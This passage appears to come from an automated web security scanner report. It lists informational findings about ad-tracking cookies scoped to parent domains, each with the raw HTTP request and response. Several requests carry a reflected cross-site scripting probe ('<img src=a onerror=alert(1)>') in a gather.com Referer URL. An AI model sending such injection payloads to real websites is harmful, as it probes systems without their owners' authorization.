Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:42:09 GMT; Path=/
Set-Cookie: rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C2%7C5%7C1001%7C1004; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:42:09 GMT; Path=/
Set-Cookie: rds=15202%7C15202%7C15202%7C15202%7C15234%7C15202%7C15202%7C15194%7C15223%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:42:09 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/
Content-Length: 0
Date: Sat, 17 Sep 2011 16:42:08 GMT

12.126. http://rp.gwallet.com/r1/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /r1/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/optout?optout&nocache=0.8992394 HTTP/1.1
Host: rp.gwallet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ra1_uid=4639578929876828096; ra1_sid=22

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rp.gwallet.com/r1/optout?check&rand=1316280015154
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711652369746398528; Expires=Sun, 16-Sep-2012 17:20:15 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=J7X1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=2; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sat, 17-Sep-2016 17:20:15 GMT; Path=/; Domain=gwallet.com; Version=1

12.127. http://rs.gwallet.com/r1/pixel/x1743  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1743

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x1743 HTTP/1.1
Host: rs.gwallet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: ra1_uid=4639578929876828096; ra1_sid=22; BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=

Response

HTTP/1.1 200 OK
Content-Length: 140
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4639578929876828096; Expires=Sun, 16-Sep-2012 17:04:29 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=J7X1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sat, 17-Sep-2016 17:04:29 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://bh.contextweb.com/bh/set.aspx?action=clr&advid=3420&token=RORO1" width="1" height="1" border="0"></body></html>
12.128. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=6344495 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgsp=eV/lKTwBeV98GzwB; lgpr=yVfKV85Xz1cWYNFXeV+kWKVYx1c=; lgtix=NQAQAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:21:29 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQASAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB; path=/; expires=Tue, 16 Sep 2014 16:21:29 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 0
Connection: close

12.129. http://s.xp1.ru4.com/coop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /coop

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coop?action_id=4&version=old&nocache=0.9566912 HTTP/1.1
Host: s.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; C1621610=0@33

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 17 Sep 2011 16:48:25 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Set-cookie: O1807966=768; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Set-cookie: C1621610=0@33; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Set-cookie: X1ID=OO-00000000000000000; domain=.ru4.com; path=/; expires=Sat, 17-Sep-2041 12:48:25 GMT
Location: http://s.xp1.ru4.com/coop?action_id=4&version=old&test_flag=1
Content-length: 0
X-Cnection: close

12.130. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=14531;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/UJ3/iview/295138956/direct/01/6447245?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B234716514%3B0-0%3B1%3B33263296%3B4252-336/280%3B40530567/40548354/1%3B%3B%7Eokv%3D%3Bsz%3D336x280%3Btile%3D2%3Bpos%3D4%3Bsite%3Dseventeen%3Bsect%3Dindex%3Bsub%3Dindex%3Bsubsub%3Dindex%3Bpage%3Dhomepage%3Bcat%3Dother%3Bsubcat%3D%3Btool%3Dros%3Bartid%3D%3Bkw%3D%3Ba%3D%3Bb%3D%3BmtfIFPath%3D/cm/shared/admeld/%3Bgame%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G14853=C1S98373-1-0-0-0-1315398787-0; G15493=C1S99917-4-0-0-0-1315313090-907727

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G14531=C1S102386-3-0-0-0-1316276740-852; path=/; domain=.suitesmart.com; expires=Thu, 15-Mar-2012 16:39:52 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:39:52 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...
12.131. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cn=1&epid=&esid=&cf=728X90&rq=1&dw=1106&cwu=http%3A%2F%2Fwww.gather.com%2F426d8%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253E31b7c6065d67ada9d%3FrecentId%3D1688849889241963%26qualityCommentWidth%3D350%26url%3Dhttp%253A%252F%252Fwww.gather.com%252F%26_%3D&cwr=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mrnd=41857482&if=0&tl=1&pxy=189,100&cxy=1106,267&dxy=1106,267&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"; C2W4=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg; cw=cw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2177
Date: Sat, 17 Sep 2011 17:04:13 GMT
Connection: close
Set-Cookie: 530930_4_90495_1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 530930_4_90495_1=1316279053114; Domain=.contextweb.com; Path=/
Set-Cookie: vf=3; Domain=.contextweb.com; Expires=Sun, 18-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3CIFRAME%20HEIGHT%3D%2290%22%20WIDTH%3D%22728%22%20SRC%3D%22http%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2FBackupTags%2F530930%2F82ee614d-b189-4b28-8d83-df850b76e9
...[SNIP]...
12.132. http://tag.contextweb.com/TagPublish/getjs.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TagPublish/getjs.aspx?01AD=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg&01RI=2245F2474819322&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=530930&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=90495 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:12:33 EDT
Content-Type: application/x-javascript;charset=utf-8
Date: Sat, 17 Sep 2011 17:04:08 GMT
Content-Length: 8825
Connection: close
Set-Cookie: C2W4=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg; expires=Sat, 15-Oct-2011 17:04:08 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:48 GMT; Path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="530930";var cwtagid="90495";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var c
...[SNIP]...
12.133. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.15086604817770422/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.15086604817770422/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.15086604817770422/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@11@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:13:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@12@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.134. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1942676946055144/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1942676946055144/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1942676946055144/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@3@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:35:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@4@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.135. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1974340253509581/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1974340253509581/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1974340253509581/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@2@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:35:08 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@3@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.136. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.2005994024220854/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.2005994024220854/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.2005994024220854/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@7@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@8@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.137. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.31795264524407685/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.31795264524407685/0/in%2Cti/ti.gif

Issue detail

